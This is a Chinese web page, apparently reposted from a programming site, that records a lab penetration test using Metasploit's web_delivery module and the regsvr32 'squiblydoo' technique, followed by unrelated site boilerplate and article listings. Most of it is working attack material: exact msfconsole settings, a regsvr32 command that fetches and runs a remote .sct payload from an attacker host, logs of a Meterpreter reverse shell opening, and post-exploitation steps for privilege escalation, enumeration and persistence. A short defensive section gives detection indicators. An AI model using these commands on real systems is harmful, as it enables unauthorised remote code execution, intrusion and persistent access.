基于Regsvr32.exe的渗透测试完整记录

基于Regsvr32.exe的渗透测试完整记录

测试环境配置

攻击端信息

  • 攻击系统:Kali Linux (Metasploit)
  • 攻击IP:192.168.1.80
  • 监听端口:7777
  • Web服务端口:8080

目标端信息

  • 目标系统:Windows
  • 目标IP:192.168.1.30
  • 连接端口:52982

完整攻击流程

步骤1:Metasploit模块配置

# 选择Web Delivery模块msf>use exploit/multi/script/web_delivery# 查看当前选项msf exploit(multi/script/web_delivery)>options# 查看可用目标类型msf exploit(multi/script/web_delivery)>show targets# 设置目标类型为Regsvr32msf exploit(multi/script/web_delivery)>settarget3# 配置Payloadmsf exploit(multi/script/web_delivery)>setpayload windows/x64/meterpreter/reverse_tcp# 设置监听主机和端口msf exploit(multi/script/web_delivery)>setlhost192.168.1.80 msf exploit(multi/script/web_delivery)>setlport7777# 设置Web服务器主机msf exploit(multi/script/web_delivery)>setsrvhost192.168.1.80# 验证配置msf exploit(multi/script/web_delivery)>show options

步骤2:启动攻击模块

# 后台运行攻击模块msf exploit(multi/script/web_delivery)>exploit -j# 系统返回信息:[*]Exploit running as background job0.[*]Exploit completed, but no session was created.[*]Started reverse TCP handler on192.168.1.80:7777[*]Using URL: http://192.168.1.80:8080/pxmlOB2r[*]Server started.

步骤3:生成攻击命令

Metasploit生成以下攻击命令:

regsvr32 /s /n /u /i:http://192.168.1.80:8080/pxmlOB2r.sct scrobj.dll

命令参数解析

  • /s: 静默模式,不显示消息框
  • /n: 不调用DllRegisterServer
  • /u: 注销服务器
  • /i:http://...: 调用DllInstall并传递恶意.sct文件的URL
  • scrobj.dll: Windows脚本组件处理库

步骤4:执行攻击

在目标Windows系统(192.168.1.30)上执行生成的regsvr32命令。

regsvr32 /s /n /u /i:http://192.168.1.80:8080/pxmlOB2r.sct scrobj.dll

步骤5:攻击成功验证

系统日志显示攻击成功:

[*] 192.168.1.30 web_delivery - Handling .sct Request [*] 192.168.1.30 web_delivery - Delivering Payload (3736 bytes) [*] Sending stage (230982 bytes) to 192.168.1.30 [*] Meterpreter session 1 opened (192.168.1.80:7777 -> 192.168.1.30:52982) at 2026-01-18 07:43:51 -0500

技术分析

1. 攻击原理

  • Web Delivery模块:在攻击机(192.168.1.80)上启动Web服务器(端口8080)
  • 恶意.sct文件:托管在http://192.168.1.80:8080/pxmlOB2r.sct
  • Regsvr32滥用:利用regsvr32.exe的/i参数加载远程脚本组件
  • 载荷投递:通过scrobj.dll执行远程.sct文件中的恶意代码

2. 网络流量分析

攻击路径: 目标机(192.168.1.30) → HTTP请求 → 攻击机(192.168.1.80:8080/pxmlOB2r.sct) 攻击机(192.168.1.80) → 反向TCP → 目标机(192.168.1.30:52982)

3. 载荷信息

  • Payload大小:3736字节(初始) + 230982字节(阶段载荷)
  • 连接方向:反向TCP连接
  • 会话信息:Session ID 1,从192.168.1.30:52982连接到192.168.1.80:7777

后续操作建议

1. 进入Meterpreter会话

# 查看当前会话msf>sessions -l# 进入会话1msf>sessions -i1# 执行基本命令meterpreter>sysinfo meterpreter>getuid meterpreter>getpid

2. 后渗透操作

# 权限提升meterpreter>getsystem# 信息收集meterpreter>run post/windows/gather/enum_logged_on_users meterpreter>run post/windows/gather/enum_applications# 持久化meterpreter>run persistence -U -i10-p7777-r192.168.1.80

防御检测建议

1. 检测指标

  • 进程创建:regsvr32.exe调用scrobj.dll
  • 网络连接:HTTP请求到异常URL的.sct文件
  • 命令行参数:包含/s /n /u /i:http://的regsvr32命令

2. 防御措施

# 监控Regsvr32执行Get-WinEvent-FilterHashtable @{LogName='Security';ID=4688}|Where-Object{$_.Message-like"*regsvr32*"-and$_.Message-like"*/i:*"}# 应用白名单限制New-Item-Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe-Force

3. 网络防护

  • 阻止从内部主机到外部IP的regsvr32相关HTTP请求
  • 监控异常.sct文件下载行为
  • 限制regsvr32.exe执行远程代码的能力

实验总结

本次测试成功演示了利用Regsvr32.exe的"squiblydoo"攻击技术,通过滥用scrobj.dll加载远程恶意.sct文件,建立了反向Meterpreter会话。攻击从启动到建立会话用时极短,显示了此类攻击的高效性和隐蔽性。防御方应重点关注regsvr32异常使用和.sct文件远程加载行为。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1179488.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

L2 Intern-S1/InternVL 微调公式识别实践

微调模型的log记录权重合并上传模型 注册modelscope申请api,上传模型meteorshowering/internvltune提交

redis启动连接命令

redis启动连接命令//重新加载systemd配置 sudo systemctl daemon-reload //再次启动redis服务 sudo systemctl start redis //查看服务状态 sudo journalctl -u redis.service -l sudo systemctl status redis.service…

短视频平台如何将16:9照片发成竖版全屏,而不是横板

问题:大家拍的16:9的照片,经常发现发布图片的时候,就变成了横板的,看着很小,丢失了很多细节解决方法:在文件夹中ctrlA全选图片,然后右键选择 向右旋转,然后这时候再发布就…

Teanary 多语言多货币外贸商城系统架构与数据流程图

项目地址:https://gitee.com/teanary/teanary_service 目录系统整体架构 数据流程图订单处理流程 多节点数据同步流程 商品创建流程 支付处理流程 促销计算流程系统整体架构 graph TBsubgraph Frontend["🌐 前端…

小程序毕设项目:基于springboot+微信小程序的公考宝典小程序(源码+文档,讲解、调试运行,定制等)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

Java毕设项目:基于springboot的4s店车辆管理系统(源码+文档,讲解、调试运行,定制等)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

基于ssm的鲜花售卖系统-计算机毕业设计源码+LW文档

摘要:随着互联网技术的发展和人们消费习惯的变化,鲜花售卖系统应运而生。本文详细阐述了基于SSM(Spring、SpringMVC、MyBatis)框架的鲜花售卖系统的研究背景意义、需求分析以及功能设计。该系统旨在满足消费者便捷购买鲜花的需求&…

Stephen Krashen(史蒂芬·克拉申)

这是B站上一个关于美国语言学家 Stephen Krashen(史蒂芬克拉申) 的视频,以下是核心信息解读: 1. 人物背景 史蒂芬克拉申是全球知名的语言学家、教育研究者,他提出的二语习得理论彻底改变了人们对语言学习的认知。他的…

4种空中飞行物数据集3561张VOC+YOLO(热气球飞艇飞机直升机)

4种空中飞行物数据集3561张VOCYOLO(热气球飞艇飞机直升机)数据集格式:VOC格式YOLO格式压缩包内含:3个文件夹,分别存储图片、xml、txt文件JPEGImages文件夹中jpg图片总计:3561Annotations文件夹中xml文件总计…

2026年目前诚信的双相钢法兰直销厂家哪家权威,高温合金法兰/不锈钢法兰/法兰/非标法兰,双相钢法兰直销厂家排行 - 品牌推荐师

双相钢法兰作为管道连接的核心部件,在石油化工、船舶制造、核电环保等高腐蚀、高压工况领域承担着保障系统安全、延长设备寿命的关键作用。其耐腐蚀性、高强度与抗疲劳性能直接影响工业生产的稳定性。根据中国机械工业…

共同探索的价值

共同探索的价值关键词:共同探索、知识共享、创新合作、团队凝聚力、跨领域融合、资源整合、价值创造摘要:本文深入探讨了共同探索在信息技术领域以及更广泛范围内的重要价值。通过详细阐述共同探索的背景、核心概念、算法原理、数学模型、项目实战、应用…

空中飞行物检测数据集2895张yolo数据集

空中飞行物检测数据集2895张yolo数据集数据集格式:VOC格式YOLO格式压缩包内含:3个文件夹,分别存储图片、xml、txt文件JPEGImages文件夹中jpg图片总计:2895Annotations文件夹中xml文件总计:2895labels文件夹中txt文件总…

计算机小程序毕设实战-基于springboot+微信小程序的公考宝典小程序【完整源码+LW+部署说明+演示视频,全bao一条龙等】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

四叶草PDF阅读器(无广告免费PDF阅读器)

四叶草PDF阅读器是一款简洁、轻量且易于使用的PDF阅读器。它提供了基本的阅读和浏览功能,使用户能够方便地浏览和查看PDF文件。该软件的界面简洁明了,容易上手,适合不熟悉PDF阅读器操作的用户。 软件功能 打开和浏览PDF文件:四叶…

FreeRTOS学习笔记(9)

消息量信号量本质上是一个特殊的队列,但是它内部是一个计数装置,通过计数来表明程序的状态,可以理解成一个状态机,信号量是FreeRTOS中用于"计数"和"同步"的工具,主要解决:1个资源多个任…

【毕业设计】基于springboot的4s店车辆管理系统(源码+文档+远程调试,全bao定制等)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

小程序毕设选题推荐:基于SpringBoot+微信小程序高考考试刷题系统基于springboot+微信小程序的公考宝典小程序【附源码、mysql、文档、调试+代码讲解+全bao等】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

为什么手机越用越卡?原来是这 3 个地方在拖后腿

很多人都有这样的体验:刚买的手机流畅得像风,用了一年半载后却开始卡顿、延迟、掉帧。其实,手机变慢并不是 “老了” 这么简单,往往是几个关键地方在悄悄拖后腿。第一个拖慢手机的元凶,是存储长期处于 “爆满” 状态。…

一文搞懂AI核心:预训练、微调与LLaMA-Factory Online高效实践

一文搞懂AI核心:预训练、微调与LLaMA-Factory Online高效实践在人工智能飞速发展的当下,预训练(Pre-Training) 与 微调(Fine-Tuning) 已成为推动AI模型不断进化的关键技术,二者相辅相成,为模型在多样化任务中…

气球数据集1155张VOC+YOLO格式

气球数据集1155张VOCYOLO格式数据集格式:VOC格式YOLO格式压缩包内含:3个文件夹,分别存储图片、xml、txt文件JPEGImages文件夹中jpg图片总计:1155Annotations文件夹中xml文件总计:1155labels文件夹中txt文件总计&#x…